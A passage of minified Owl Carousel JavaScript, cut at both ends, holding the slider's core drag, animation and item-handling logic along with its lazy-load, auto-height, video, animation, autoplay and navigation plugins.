this.preloadAutoWidthImages(b),!1}this.$element.addClass("owl-loading"),this.$stage=a("<"+this.settings.stageElement+' class="owl-stage"/>').wrap('<div class="owl-stage-outer">'),this.$element.append(this.$stage.parent()),this.replace(this.$element.children().not(this.$stage.parent())),this._width=this.$element.width(),this.refresh(),this.$element.removeClass("owl-loading").addClass("owl-loaded"),this.eventsCall(),this.internalEvents(),this.addTriggerableEvents(),this.trigger("initialized")},e.prototype.setup=function(){var b=this.viewport(),c=this.options.responsive,d=-1,e=null;c?(a.each(c,function(a){b>=a&&a>d&&(d=Number(a))}),e=a.extend({},this.options,c[d]),delete e.responsive,e.responsiveClass&&this.$element.attr("class",function(a,b){return b.replace(/\b owl-responsive-\S+/g,"")}).addClass("owl-responsive-"+d)):e=a.extend({},this.options),(null===this.settings||this._breakpoint!==d)&&(this.trigger("change",{property:{name:"settings",value:e}}),this._breakpoint=d,this.settings=e,this.invalidate("settings"),this.trigger("changed",{property:{name:"settings",value:this.settings}}))},e.prototype.optionsLogic=function(){this.$element.toggleClass("owl-center",this.settings.center),this.settings.loop&&this._items.length<this.settings.items&&(this.settings.loop=!1),this.settings.autoWidth&&(this.settings.stagePadding=!1,this.settings.merge=!1)},e.prototype.prepare=function(b){var c=this.trigger("prepare",{content:b});return c.data||(c.data=a("<"+this.settings.itemElement+"/>").addClass(this.settings.itemClass).append(b)),this.trigger("prepared",{content:c.data}),c.data},e.prototype.update=function(){for(var b=0,c=this._pipe.length,d=a.proxy(function(a){return this[a]},this._invalidated),e={};c>b;)(this._invalidated.all||a.grep(this._pipe[b].filter,d).length>0)&&this._pipe[b].run(e),b++;this._invalidated={}},e.prototype.width=function(a){switch(a=a||e.Width.Default){case e.Width.Inner:case e.Width.Outer:return this._width;default:return this._width-2*this.settings.stagePadding+this.settings.margin}},e.prototype.refresh=function(){if(0===this._items.length)return!1;(new Date).getTime();this.trigger("refresh"),this.setup(),this.optionsLogic(),this.$stage.addClass("owl-refresh"),this.update(),this.$stage.removeClass("owl-refresh"),this.state.orientation=b.orientation,this.watchVisibility(),this.trigger("refreshed")},e.prototype.eventsCall=function(){this.e._onDragStart=a.proxy(function(a){this.onDragStart(a)},this),this.e._onDragMove=a.proxy(function(a){this.onDragMove(a)},this),this.e._onDragEnd=a.proxy(function(a){this.onDragEnd(a)},this),this.e._onResize=a.proxy(function(a){this.onResize(a)},this),this.e._transitionEnd=a.proxy(function(a){this.transitionEnd(a)},this),this.e._preventClick=a.proxy(function(a){this.preventClick(a)},this)},e.prototype.onThrottledResize=function(){b.clearTimeout(this.resizeTimer),this.resizeTimer=b.setTimeout(this.e._onResize,this.settings.responsiveRefreshRate)},e.prototype.onResize=function(){return this._items.length?this._width===this.$element.width()?!1:this.trigger("resize").isDefaultPrevented()?!1:(this._width=this.$element.width(),this.invalidate("width"),this.refresh(),void this.trigger("resized")):!1},e.prototype.eventsRouter=function(a){var b=a.type;"mousedown"===b||"touchstart"===b?this.onDragStart(a):"mousemove"===b||"touchmove"===b?this.onDragMove(a):"mouseup"===b||"touchend"===b?this.onDragEnd(a):"touchcancel"===b&&this.onDragEnd(a)},e.prototype.internalEvents=function(){var c=(k(),l());this.settings.mouseDrag?(this.$stage.on("mousedown",a.proxy(function(a){this.eventsRouter(a)},this)),this.$stage.on("dragstart",function(){return!1}),this.$stage.get(0).onselectstart=function(){return!1}):this.$element.addClass("owl-text-select-on"),this.settings.touchDrag&&!c&&this.$stage.on("touchstart touchcancel",a.proxy(function(a){this.eventsRouter(a)},this)),this.transitionEndVendor&&this.on(this.$stage.get(0),this.transitionEndVendor,this.e._transitionEnd,!1),this.settings.responsive!==!1&&this.on(b,"resize",a.proxy(this.onThrottledResize,this))},e.prototype.onDragStart=function(d){var e,g,h,i;if(e=d.originalEvent||d||b.event,3===e.which||this.state.isTouch)return!1;if("mousedown"===e.type&&this.$stage.addClass("owl-grab"),this.trigger("drag"),this.drag.startTime=(new Date).getTime(),this.speed(0),this.state.isTouch=!0,this.state.isScrolling=!1,this.state.isSwiping=!1,this.drag.distance=0,g=f(e).x,h=f(e).y,this.drag.offsetX=this.$stage.position().left,this.drag.offsetY=this.$stage.position().top,this.settings.rtl&&(this.drag.offsetX=this.$stage.position().left+this.$stage.width()-this.width()+this.settings.margin),this.state.inMotion&&this.support3d)i=this.getTransformProperty(),this.drag.offsetX=i,this.animate(i),this.state.inMotion=!0;else if(this.state.inMotion&&!this.support3d)return this.state.inMotion=!1,!1;this.drag.startX=g-this.drag.offsetX,this.drag.startY=h-this.drag.offsetY,this.drag.start=g-this.drag.startX,this.drag.targetEl=e.target||e.srcElement,this.drag.updatedX=this.drag.start,("IMG"===this.drag.targetEl.tagName||"A"===this.drag.targetEl.tagName)&&(this.drag.targetEl.draggable=!1),a(c).on("mousemove.owl.dragEvents mouseup.owl.dragEvents touchmove.owl.dragEvents touchend.owl.dragEvents",a.proxy(function(a){this.eventsRouter(a)},this))},e.prototype.onDragMove=function(a){var c,e,g,h,i,j;this.state.isTouch&&(this.state.isScrolling||(c=a.originalEvent||a||b.event,e=f(c).x,g=f(c).y,this.drag.currentX=e-this.drag.startX,this.drag.currentY=g-this.drag.startY,this.drag.distance=this.drag.currentX-this.drag.offsetX,this.drag.distance<0?this.state.direction=this.settings.rtl?"right":"left":this.drag.distance>0&&(this.state.direction=this.settings.rtl?"left":"right"),this.settings.loop?this.op(this.drag.currentX,">",this.coordinates(this.minimum()))&&"right"===this.state.direction?this.drag.currentX-=(this.settings.center&&this.coordinates(0))-this.coordinates(this._items.length):this.op(this.drag.currentX,"<",this.coordinates(this.maximum()))&&"left"===this.state.direction&&(this.drag.currentX+=(this.settings.center&&this.coordinates(0))-this.coordinates(this._items.length)):(h=this.coordinates(this.settings.rtl?this.maximum():this.minimum()),i=this.coordinates(this.settings.rtl?this.minimum():this.maximum()),j=this.settings.pullDrag?this.drag.distance/5:0,this.drag.currentX=Math.max(Math.min(this.drag.currentX,h+j),i+j)),(this.drag.distance>8||this.drag.distance<-8)&&(c.preventDefault!==d?c.preventDefault():c.returnValue=!1,this.state.isSwiping=!0),this.drag.updatedX=this.drag.currentX,(this.drag.currentY>16||this.drag.currentY<-16)&&this.state.isSwiping===!1&&(this.state.isScrolling=!0,this.drag.updatedX=this.drag.start),this.animate(this.drag.updatedX)))},e.prototype.onDragEnd=function(b){var d,e,f;if(this.state.isTouch){if("mouseup"===b.type&&this.$stage.removeClass("owl-grab"),this.trigger("dragged"),this.drag.targetEl.removeAttribute("draggable"),this.state.isTouch=!1,this.state.isScrolling=!1,this.state.isSwiping=!1,0===this.drag.distance&&this.state.inMotion!==!0)return this.state.inMotion=!1,!1;this.drag.endTime=(new Date).getTime(),d=this.drag.endTime-this.drag.startTime,e=Math.abs(this.drag.distance),(e>3||d>300)&&this.removeClick(this.drag.targetEl),f=this.closest(this.drag.updatedX),this.speed(this.settings.dragEndSpeed||this.settings.smartSpeed),this.current(f),this.invalidate("position"),this.update(),this.settings.pullDrag||this.drag.updatedX!==this.coordinates(f)||this.transitionEnd(),this.drag.distance=0,a(c).off(".owl.dragEvents")}},e.prototype.removeClick=function(c){this.drag.targetEl=c,a(c).on("click.preventClick",this.e._preventClick),b.setTimeout(function(){a(c).off("click.preventClick")},300)},e.prototype.preventClick=function(b){b.preventDefault?b.preventDefault():b.returnValue=!1,b.stopPropagation&&b.stopPropagation(),a(b.target).off("click.preventClick")},e.prototype.getTransformProperty=function(){var a,c;return a=b.getComputedStyle(this.$stage.get(0),null).getPropertyValue(this.vendorName+"transform"),a=a.replace(/matrix(3d)?\(|\)/g,"").split(","),c=16===a.length,c!==!0?a[4]:a[12]},e.prototype.closest=function(b){var c=-1,d=30,e=this.width(),f=this.coordinates();return this.settings.freeDrag||a.each(f,a.proxy(function(a,g){return b>g-d&&g+d>b?c=a:this.op(b,"<",g)&&this.op(b,">",f[a+1]||g-e)&&(c="left"===this.state.direction?a+1:a),-1===c},this)),this.settings.loop||(this.op(b,">",f[this.minimum()])?c=b=this.minimum():this.op(b,"<",f[this.maximum()])&&(c=b=this.maximum())),c},e.prototype.animate=function(b){this.trigger("translate"),this.state.inMotion=this.speed()>0,this.support3d?this.$stage.css({transform:"translate3d("+b+"px,0px, 0px)",transition:this.speed()/1e3+"s"}):this.state.isTouch?this.$stage.css({left:b+"px"}):this.$stage.animate({left:b},this.speed()/1e3,this.settings.fallbackEasing,a.proxy(function(){this.state.inMotion&&this.transitionEnd()},this))},e.prototype.current=function(a){if(a===d)return this._current;if(0===this._items.length)return d;if(a=this.normalize(a),this._current!==a){var b=this.trigger("change",{property:{name:"position",value:a}});b.data!==d&&(a=this.normalize(b.data)),this._current=a,this.invalidate("position"),this.trigger("changed",{property:{name:"position",value:this._current}})}return this._current},e.prototype.invalidate=function(a){this._invalidated[a]=!0},e.prototype.reset=function(a){a=this.normalize(a),a!==d&&(this._speed=0,this._current=a,this.suppress(["translate","translated"]),this.animate(this.coordinates(a)),this.release(["translate","translated"]))},e.prototype.normalize=function(b,c){var e=c?this._items.length:this._items.length+this._clones.length;return!a.isNumeric(b)||1>e?d:b=this._clones.length?(b%e+e)%e:Math.max(this.minimum(c),Math.min(this.maximum(c),b))},e.prototype.relative=function(a){return a=this.normalize(a),a-=this._clones.length/2,this.normalize(a,!0)},e.prototype.maximum=function(a){var b,c,d,e=0,f=this.settings;if(a)return this._items.length-1;if(!f.loop&&f.center)b=this._items.length-1;else if(f.loop||f.center)if(f.loop||f.center)b=this._items.length+f.items;else{if(!f.autoWidth&&!f.merge)throw"Can not detect maximum absolute position.";for(revert=f.rtl?1:-1,c=this.$stage.width()-this.$element.width();(d=this.coordinates(e))&&!(d*revert>=c);)b=++e}else b=this._items.length-f.items;return b},e.prototype.minimum=function(a){return a?0:this._clones.length/2},e.prototype.items=function(a){return a===d?this._items.slice():(a=this.normalize(a,!0),this._items[a])},e.prototype.mergers=function(a){return a===d?this._mergers.slice():(a=this.normalize(a,!0),this._mergers[a])},e.prototype.clones=function(b){var c=this._clones.length/2,e=c+this._items.length,f=function(a){return a%2===0?e+a/2:c-(a+1)/2};return b===d?a.map(this._clones,function(a,b){return f(b)}):a.map(this._clones,function(a,c){return a===b?f(c):null})},e.prototype.speed=function(a){return a!==d&&(this._speed=a),this._speed},e.prototype.coordinates=function(b){var c=null;return b===d?a.map(this._coordinates,a.proxy(function(a,b){return this.coordinates(b)},this)):(this.settings.center?(c=this._coordinates[b],c+=(this.width()-c+(this._coordinates[b-1]||0))/2*(this.settings.rtl?-1:1)):c=this._coordinates[b-1]||0,c)},e.prototype.duration=function(a,b,c){return Math.min(Math.max(Math.abs(b-a),1),6)*Math.abs(c||this.settings.smartSpeed)},e.prototype.to=function(c,d){if(this.settings.loop){var e=c-this.relative(this.current()),f=this.current(),g=this.current(),h=this.current()+e,i=0>g-h?!0:!1,j=this._clones.length+this._items.length;h<this.settings.items&&i===!1?(f=g+this._items.length,this.reset(f)):h>=j-this.settings.items&&i===!0&&(f=g-this._items.length,this.reset(f)),b.clearTimeout(this.e._goToLoop),this.e._goToLoop=b.setTimeout(a.proxy(function(){this.speed(this.duration(this.current(),f+e,d)),this.current(f+e),this.update()},this),30)}else this.speed(this.duration(this.current(),c,d)),this.current(c),this.update()},e.prototype.next=function(a){a=a||!1,this.to(this.relative(this.current())+1,a)},e.prototype.prev=function(a){a=a||!1,this.to(this.relative(this.current())-1,a)},e.prototype.transitionEnd=function(a){return a!==d&&(a.stopPropagation(),(a.target||a.srcElement||a.originalTarget)!==this.$stage.get(0))?!1:(this.state.inMotion=!1,void this.trigger("translated"))},e.prototype.viewport=function(){var d;if(this.options.responsiveBaseElement!==b)d=a(this.options.responsiveBaseElement).width();else if(b.innerWidth)d=b.innerWidth;else{if(!c.documentElement||!c.documentElement.clientWidth)throw"Can not detect viewport width.";d=c.documentElement.clientWidth}return d},e.prototype.replace=function(b){this.$stage.empty(),this._items=[],b&&(b=b instanceof jQuery?b:a(b)),this.settings.nestedItemSelector&&(b=b.find("."+this.settings.nestedItemSelector)),b.filter(function(){return 1===this.nodeType}).each(a.proxy(function(a,b){b=this.prepare(b),this.$stage.append(b),this._items.push(b),this._mergers.push(1*b.find("[data-merge]").andSelf("[data-merge]").attr("data-merge")||1)},this)),this.reset(a.isNumeric(this.settings.startPosition)?this.settings.startPosition:0),this.invalidate("items")},e.prototype.add=function(a,b){b=b===d?this._items.length:this.normalize(b,!0),this.trigger("add",{content:a,position:b}),0===this._items.length||b===this._items.length?(this.$stage.append(a),this._items.push(a),this._mergers.push(1*a.find("[data-merge]").andSelf("[data-merge]").attr("data-merge")||1)):(this._items[b].before(a),this._items.splice(b,0,a),this._mergers.splice(b,0,1*a.find("[data-merge]").andSelf("[data-merge]").attr("data-merge")||1)),this.invalidate("items"),this.trigger("added",{content:a,position:b})},e.prototype.remove=function(a){a=this.normalize(a,!0),a!==d&&(this.trigger("remove",{content:this._items[a],position:a}),this._items[a].remove(),this._items.splice(a,1),this._mergers.splice(a,1),this.invalidate("items"),this.trigger("removed",{content:null,position:a}))},e.prototype.addTriggerableEvents=function(){var b=a.proxy(function(b,c){return a.proxy(function(a){a.relatedTarget!==this&&(this.suppress([c]),b.apply(this,[].slice.call(arguments,1)),this.release([c]))},this)},this);a.each({next:this.next,prev:this.prev,to:this.to,destroy:this.destroy,refresh:this.refresh,replace:this.replace,add:this.add,remove:this.remove},a.proxy(function(a,c){this.$element.on(a+".owl.carousel",b(c,a+".owl.carousel"))},this))},e.prototype.watchVisibility=function(){function c(a){return a.offsetWidth>0&&a.offsetHeight>0}function d(){c(this.$element.get(0))&&(this.$element.removeClass("owl-hidden"),this.refresh(),b.clearInterval(this.e._checkVisibile))}c(this.$element.get(0))||(this.$element.addClass("owl-hidden"),b.clearInterval(this.e._checkVisibile),this.e._checkVisibile=b.setInterval(a.proxy(d,this),500))},e.prototype.preloadAutoWidthImages=function(b){var c,d,e,f;c=0,d=this,b.each(function(g,h){e=a(h),f=new Image,f.onload=function(){c++,e.attr("src",f.src),e.css("opacity",1),c>=b.length&&(d.state.imagesLoaded=!0,d.initialize())},f.src=e.attr("src")||e.attr("data-src")||e.attr("data-src-retina")})},e.prototype.destroy=function(){this.$element.hasClass(this.settings.themeClass)&&this.$element.removeClass(this.settings.themeClass),this.settings.responsive!==!1&&a(b).off("resize.owl.carousel"),this.transitionEndVendor&&this.off(this.$stage.get(0),this.transitionEndVendor,this.e._transitionEnd);for(var d in this._plugins)this._plugins[d].destroy();(this.settings.mouseDrag||this.settings.touchDrag)&&(this.$stage.off("mousedown touchstart touchcancel"),a(c).off(".owl.dragEvents"),this.$stage.get(0).onselectstart=function(){},this.$stage.off("dragstart",function(){return!1})),this.$element.off(".owl"),this.$stage.children(".cloned").remove(),this.e=null,this.$element.removeData("owlCarousel"),this.$stage.children().contents().unwrap(),this.$stage.children().unwrap(),this.$stage.unwrap()},e.prototype.op=function(a,b,c){var d=this.settings.rtl;switch(b){case"<":return d?a>c:c>a;case">":return d?c>a:a>c;case">=":return d?c>=a:a>=c;case"<=":return d?a>=c:c>=a}},e.prototype.on=function(a,b,c,d){a.addEventListener?a.addEventListener(b,c,d):a.attachEvent&&a.attachEvent("on"+b,c)},e.prototype.off=function(a,b,c,d){a.removeEventListener?a.removeEventListener(b,c,d):a.detachEvent&&a.detachEvent("on"+b,c)},e.prototype.trigger=function(b,c,d){var e={item:{count:this._items.length,index:this.current()}},f=a.camelCase(a.grep(["on",b,d],function(a){return a}).join("-").toLowerCase()),g=a.Event([b,"owl",d||"carousel"].join(".").toLowerCase(),a.extend({relatedTarget:this},e,c));return this._supress[b]||(a.each(this._plugins,function(a,b){b.onTrigger&&b.onTrigger(g)}),this.$element.trigger(g),this.settings&&"function"==typeof this.settings[f]&&this.settings[f].apply(this,g)),g},e.prototype.suppress=function(b){a.each(b,a.proxy(function(a,b){this._supress[b]=!0},this))},e.prototype.release=function(b){a.each(b,a.proxy(function(a,b){delete this._supress[b]},this))},e.prototype.browserSupport=function(){if(this.support3d=j(),this.support3d){this.transformVendor=i();var a=["transitionend","webkitTransitionEnd","transitionend","oTransitionEnd"];this.transitionEndVendor=a[h()],this.vendorName=this.transformVendor.replace(/Transform/i,""),this.vendorName=""!==this.vendorName?"-"+this.vendorName.toLowerCase()+"-":""}this.state.orientation=b.orientation},a.fn.owlCarousel=function(b){return this.each(function(){a(this).data("owlCarousel")||a(this).data("owlCarousel",new e(this,b))})},a.fn.owlCarousel.Constructor=e}(window.Zepto||window.jQuery,window,document),function(a,b){var c=function(b){this._core=b,this._loaded=[],this._handlers={"initialized.owl.carousel change.owl.carousel":a.proxy(function(b){if(b.namespace&&this._core.settings&&this._core.settings.lazyLoad&&(b.property&&"position"==b.property.name||"initialized"==b.type))for(var c=this._core.settings,d=c.center&&Math.ceil(c.items/2)||c.items,e=c.center&&-1*d||0,f=(b.property&&b.property.value||this._core.current())+e,g=this._core.clones().length,h=a.proxy(function(a,b){this.load(b)},this);e++<d;)this.load(g/2+this._core.relative(f)),g&&a.each(this._core.clones(this._core.relative(f++)),h)},this)},this._core.options=a.extend({},c.Defaults,this._core.options),this._core.$element.on(this._handlers)};c.Defaults={lazyLoad:!1},c.prototype.load=function(c){var d=this._core.$stage.children().eq(c),e=d&&d.find(".owl-lazy");!e||a.inArray(d.get(0),this._loaded)>-1||(e.each(a.proxy(function(c,d){var e,f=a(d),g=b.devicePixelRatio>1&&f.attr("data-src-retina")||f.attr("data-src");this._core.trigger("load",{element:f,url:g},"lazy"),f.is("img")?f.one("load.owl.lazy",a.proxy(function(){f.css("opacity",1),this._core.trigger("loaded",{element:f,url:g},"lazy")},this)).attr("src",g):(e=new Image,e.onload=a.proxy(function(){f.css({"background-image":"url("+g+")",opacity:"1"}),this._core.trigger("loaded",{element:f,url:g},"lazy")},this),e.src=g)},this)),this._loaded.push(d.get(0)))},c.prototype.destroy=function(){var a,b;for(a in this.handlers)this._core.$element.off(a,this.handlers[a]);for(b in Object.getOwnPropertyNames(this))"function"!=typeof this[b]&&(this[b]=null)},a.fn.owlCarousel.Constructor.Plugins.Lazy=c}(window.Zepto||window.jQuery,window,document),function(a){var b=function(c){this._core=c,this._handlers={"initialized.owl.carousel":a.proxy(function(){this._core.settings.autoHeight&&this.update()},this),"changed.owl.carousel":a.proxy(function(a){this._core.settings.autoHeight&&"position"==a.property.name&&this.update()},this),"loaded.owl.lazy":a.proxy(function(a){this._core.settings.autoHeight&&a.element.closest("."+this._core.settings.itemClass)===this._core.$stage.children().eq(this._core.current())&&this.update()},this)},this._core.options=a.extend({},b.Defaults,this._core.options),this._core.$element.on(this._handlers)};b.Defaults={autoHeight:!1,autoHeightClass:"owl-height"},b.prototype.update=function(){this._core.$stage.parent().height(this._core.$stage.children().eq(this._core.current()).height()).addClass(this._core.settings.autoHeightClass)},b.prototype.destroy=function(){var a,b;for(a in this._handlers)this._core.$element.off(a,this._handlers[a]);for(b in Object.getOwnPropertyNames(this))"function"!=typeof this[b]&&(this[b]=null)},a.fn.owlCarousel.Constructor.Plugins.AutoHeight=b}(window.Zepto||window.jQuery,window,document),function(a,b,c){var d=function(b){this._core=b,this._videos={},this._playing=null,this._fullscreen=!1,this._handlers={"resize.owl.carousel":a.proxy(function(a){this._core.settings.video&&!this.isInFullScreen()&&a.preventDefault()},this),"refresh.owl.carousel changed.owl.carousel":a.proxy(function(){this._playing&&this.stop()},this),"prepared.owl.carousel":a.proxy(function(b){var c=a(b.content).find(".owl-video");c.length&&(c.css("display","none"),this.fetch(c,a(b.content)))},this)},this._core.options=a.extend({},d.Defaults,this._core.options),this._core.$element.on(this._handlers),this._core.$element.on("click.owl.video",".owl-video-play-icon",a.proxy(function(a){this.play(a)},this))};d.Defaults={video:!1,videoHeight:!1,videoWidth:!1},d.prototype.fetch=function(a,b){var c=a.attr("data-vimeo-id")?"vimeo":"youtube",d=a.attr("data-vimeo-id")||a.attr("data-youtube-id"),e=a.attr("data-width")||this._core.settings.videoWidth,f=a.attr("data-height")||this._core.settings.videoHeight,g=a.attr("href");if(!g)throw new Error("Missing video URL.");if(d=g.match(/(http:|https:|)\/\/(player.|www.)?(vimeo\.com|youtu(be\.com|\.be|be\.googleapis\.com))\/(video\/|embed\/|watch\?v=|v\/)?([A-Za-z0-9._%-]*)(\&\S+)?/),d[3].indexOf("youtu")>-1)c="youtube";else{if(!(d[3].indexOf("vimeo")>-1))throw new Error("Video URL not supported.");c="vimeo"}d=d[6],this._videos[g]={type:c,id:d,width:e,height:f},b.attr("data-video",g),this.thumbnail(a,this._videos[g])},d.prototype.thumbnail=function(b,c){var d,e,f,g=c.width&&c.height?'style="width:'+c.width+"px;height:"+c.height+'px;"':"",h=b.find("img"),i="src",j="",k=this._core.settings,l=function(a){e='<div class="owl-video-play-icon"></div>',d=k.lazyLoad?'<div class="owl-video-tn '+j+'" '+i+'="'+a+'"></div>':'<div class="owl-video-tn" style="opacity:1;background-image:url('+a+')"></div>',b.after(d),b.after(e)};return b.wrap('<div class="owl-video-wrapper"'+g+"></div>"),this._core.settings.lazyLoad&&(i="data-src",j="owl-lazy"),h.length?(l(h.attr(i)),h.remove(),!1):void("youtube"===c.type?(f="http://img.youtube.com/vi/"+c.id+"/hqdefault.jpg",l(f)):"vimeo"===c.type&&a.ajax({type:"GET",url:"http://vimeo.com/api/v2/video/"+c.id+".json",jsonp:"callback",dataType:"jsonp",success:function(a){f=a[0].thumbnail_large,l(f)}}))},d.prototype.stop=function(){this._core.trigger("stop",null,"video"),this._playing.find(".owl-video-frame").remove(),this._playing.removeClass("owl-video-playing"),this._playing=null},d.prototype.play=function(b){this._core.trigger("play",null,"video"),this._playing&&this.stop();var c,d,e=a(b.target||b.srcElement),f=e.closest("."+this._core.settings.itemClass),g=this._videos[f.attr("data-video")],h=g.width||"100%",i=g.height||this._core.$stage.height();"youtube"===g.type?c='<iframe width="'+h+'" height="'+i+'" src="http://www.youtube.com/embed/'+g.id+"?autoplay=1&v="+g.id+'" frameborder="0" allowfullscreen></iframe>':"vimeo"===g.type&&(c='<iframe src="http://player.vimeo.com/video/'+g.id+'?autoplay=1" width="'+h+'" height="'+i+'" frameborder="0" webkitallowfullscreen mozallowfullscreen allowfullscreen></iframe>'),f.addClass("owl-video-playing"),this._playing=f,d=a('<div style="height:'+i+"px; width:"+h+'px" class="owl-video-frame">'+c+"</div>"),e.after(d)},d.prototype.isInFullScreen=function(){var d=c.fullscreenElement||c.mozFullScreenElement||c.webkitFullscreenElement;return d&&a(d).parent().hasClass("owl-video-frame")&&(this._core.speed(0),this._fullscreen=!0),d&&this._fullscreen&&this._playing?!1:this._fullscreen?(this._fullscreen=!1,!1):this._playing&&this._core.state.orientation!==b.orientation?(this._core.state.orientation=b.orientation,!1):!0},d.prototype.destroy=function(){var a,b;this._core.$element.off("click.owl.video");for(a in this._handlers)this._core.$element.off(a,this._handlers[a]);for(b in Object.getOwnPropertyNames(this))"function"!=typeof this[b]&&(this[b]=null)},a.fn.owlCarousel.Constructor.Plugins.Video=d}(window.Zepto||window.jQuery,window,document),function(a,b,c,d){var e=function(b){this.core=b,this.core.options=a.extend({},e.Defaults,this.core.options),this.swapping=!0,this.previous=d,this.next=d,this.handlers={"change.owl.carousel":a.proxy(function(a){"position"==a.property.name&&(this.previous=this.core.current(),this.next=a.property.value)},this),"drag.owl.carousel dragged.owl.carousel translated.owl.carousel":a.proxy(function(a){this.swapping="translated"==a.type},this),"translate.owl.carousel":a.proxy(function(){this.swapping&&(this.core.options.animateOut||this.core.options.animateIn)&&this.swap()},this)},this.core.$element.on(this.handlers)};e.Defaults={animateOut:!1,animateIn:!1},e.prototype.swap=function(){if(1===this.core.settings.items&&this.core.support3d){this.core.speed(0);var b,c=a.proxy(this.clear,this),d=this.core.$stage.children().eq(this.previous),e=this.core.$stage.children().eq(this.next),f=this.core.settings.animateIn,g=this.core.settings.animateOut;this.core.current()!==this.previous&&(g&&(b=this.core.coordinates(this.previous)-this.core.coordinates(this.next),d.css({left:b+"px"}).addClass("animated owl-animated-out").addClass(g).one("webkitAnimationEnd mozAnimationEnd MSAnimationEnd oanimationend animationend",c)),f&&e.addClass("animated owl-animated-in").addClass(f).one("webkitAnimationEnd mozAnimationEnd MSAnimationEnd oanimationend animationend",c))}},e.prototype.clear=function(b){a(b.target).css({left:""}).removeClass("animated owl-animated-out owl-animated-in").removeClass(this.core.settings.animateIn).removeClass(this.core.settings.animateOut),this.core.transitionEnd()},e.prototype.destroy=function(){var a,b;for(a in this.handlers)this.core.$element.off(a,this.handlers[a]);for(b in Object.getOwnPropertyNames(this))"function"!=typeof this[b]&&(this[b]=null)},a.fn.owlCarousel.Constructor.Plugins.Animate=e}(window.Zepto||window.jQuery,window,document),function(a,b,c){var d=function(b){this.core=b,this.core.options=a.extend({},d.Defaults,this.core.options),this.handlers={"translated.owl.carousel refreshed.owl.carousel":a.proxy(function(){this.autoplay() },this),"play.owl.autoplay":a.proxy(function(a,b,c){this.play(b,c)},this),"stop.owl.autoplay":a.proxy(function(){this.stop()},this),"mouseover.owl.autoplay":a.proxy(function(){this.core.settings.autoplayHoverPause&&this.pause()},this),"mouseleave.owl.autoplay":a.proxy(function(){this.core.settings.autoplayHoverPause&&this.autoplay()},this)},this.core.$element.on(this.handlers)};d.Defaults={autoplay:!1,autoplayTimeout:5e3,autoplayHoverPause:!1,autoplaySpeed:!1},d.prototype.autoplay=function(){this.core.settings.autoplay&&!this.core.state.videoPlay?(b.clearInterval(this.interval),this.interval=b.setInterval(a.proxy(function(){this.play()},this),this.core.settings.autoplayTimeout)):b.clearInterval(this.interval)},d.prototype.play=function(){return c.hidden===!0||this.core.state.isTouch||this.core.state.isScrolling||this.core.state.isSwiping||this.core.state.inMotion?void 0:this.core.settings.autoplay===!1?void b.clearInterval(this.interval):void this.core.next(this.core.settings.autoplaySpeed)},d.prototype.stop=function(){b.clearInterval(this.interval)},d.prototype.pause=function(){b.clearInterval(this.interval)},d.prototype.destroy=function(){var a,c;b.clearInterval(this.interval);for(a in this.handlers)this.core.$element.off(a,this.handlers[a]);for(c in Object.getOwnPropertyNames(this))"function"!=typeof this[c]&&(this[c]=null)},a.fn.owlCarousel.Constructor.Plugins.autoplay=d}(window.Zepto||window.jQuery,window,document),function(a){"use strict";var b=function(c){this._core=c,this._initialized=!1,this._pages=[],this._controls={},this._templates=[],this.$element=this._core.$element,this._overrides={next:this._core.next,prev:this._core.prev,to:this._core.to},this._handlers={"prepared.owl.carousel":a.proxy(function(b){this._core.settings.dotsData&&this._templates.push(a(b.content).find("[data-dot]").andSelf("[data-dot]").attr("data-dot"))},this),"add.owl.carousel":a.proxy(function(b){this._core.settings.dotsData&&this._templates.splice(b.position,0,a(b.content).find("[data-dot]").andSelf("[data-dot]").attr("data-dot"))},this),"remove.owl.carousel prepared.owl.carousel":a.proxy(function(a){this._core.settings.dotsData&&this._templates.splice(a.position,1)},this),"change.owl.carousel":a.proxy(function(a){if("position"==a.property.name&&!this._core.state.revert&&!this._core.settings.loop&&this._core.settings.navRewind){var b=this._core.current(),c=this._core.maximum(),d=this._core.minimum();a.data=a.property.value>c?b>=c?d:c:a.property.value<d?c:a.property.value}},this),"changed.owl.carousel":a.proxy(function(a){"position"==a.property.name&&this.draw()},this),"refreshed.owl.carousel":a.proxy(function(){this._initialized||(this.initialize(),this._initialized=!0),this._core.trigger("refresh",null,"navigation"),this.update(),this.draw(),this._core.trigger("refreshed",null,"navigation")},this)},this._core.options=a.extend({},b.Defaults,this._core.options),this.$element.on(this._handlers)};b.Defaults={nav:!1,navRewind:!0,navText:["prev","next"],navSpeed:!1,navElement:"div",navContainer:!1,navContainerClass:"owl-nav",navClass:["owl-prev","owl-next"],slideBy:1,dotClass:"owl-dot",dotsClass:"owl-dots",dots:!0,dotsEach:!1,dotData:!1,dotsSpeed:!1,dotsContainer:!1,controlsClass:"owl-controls"},b.prototype.initialize=function(){var b,c,d=this._core.settings;d.dotsData||(this._templates=[a("<div>").addClass(d.dotClass).append(a("<span>")).prop("outerHTML")]),d.navContainer&&d.dotsContainer||(this._controls.$container=a("<div>").addClass(d.controlsClass).appendTo(this.$element)),this._controls.$indicators=d.dotsContainer?a(d.dotsContainer):a("<div>").hide().addClass(d.dotsClass).appendTo(this._controls.$container),this._controls.$indicators.on("click","div",a.proxy(function(b){var c=a(b.target).parent().is(this._controls.$indicators)?a(b.target).index():a(b.target).parent().index();b.preventDefault(),this.to(c,d.dotsSpeed)},this)),b=d.navContainer?a(d.navContainer):a("<div>").addClass(d.navContainerClass).prependTo(this._controls.$container),this._controls.$next=a("<"+d.navElement+">"),this._controls.$previous=this._controls.$next.clone(),this._controls.$previous.addClass(d.navClass[0]).html(d.navText[0]).hide().prependTo(b).on("click",a.proxy(function(){this.prev(d.navSpeed)},this)),this._controls.$next.addClass(d.navClass[1]).html(d.navText[1]).hide().appendTo(b).on("click",a.proxy(function(){this.next(d.navSpeed)},this));for(c in this._overrides)this._core[c]=a.proxy(this[c],this)},b.prototype.destroy=function(){var a,b,c,d;for(a in this._handlers)this.$element.off(a,this._handlers[a]);for(b in this._controls)this._controls[b].remove();for(d in this.overides)this._core[d]=this._overrides[d];for(c in Object.getOwnPropertyNames(this))"function"!=typeof this[c]&&(this[c]=null)},b.prototype.update=function(){var a,b,c,d=this._core.settings,e=this._core.clones().length/2,f=e+this._core.items().length,g=d.center||d.autoWidth||d.dotData?1:d.dotsEach||d.items;if("page"!==d.slideBy&&(d.slideBy=Math.min(d.slideBy,d.items)),d.dots||"page"==d.slideBy)for(this._pages=[],a=e,b=0,c=0;f>a;a++)(b>=g||0===b)&&(this._pages.push({start:a-e,end:a-e+g-1}),b=0,++c),b+=this._core.mergers(this._core.relative(a))},b.prototype.draw=function(){var 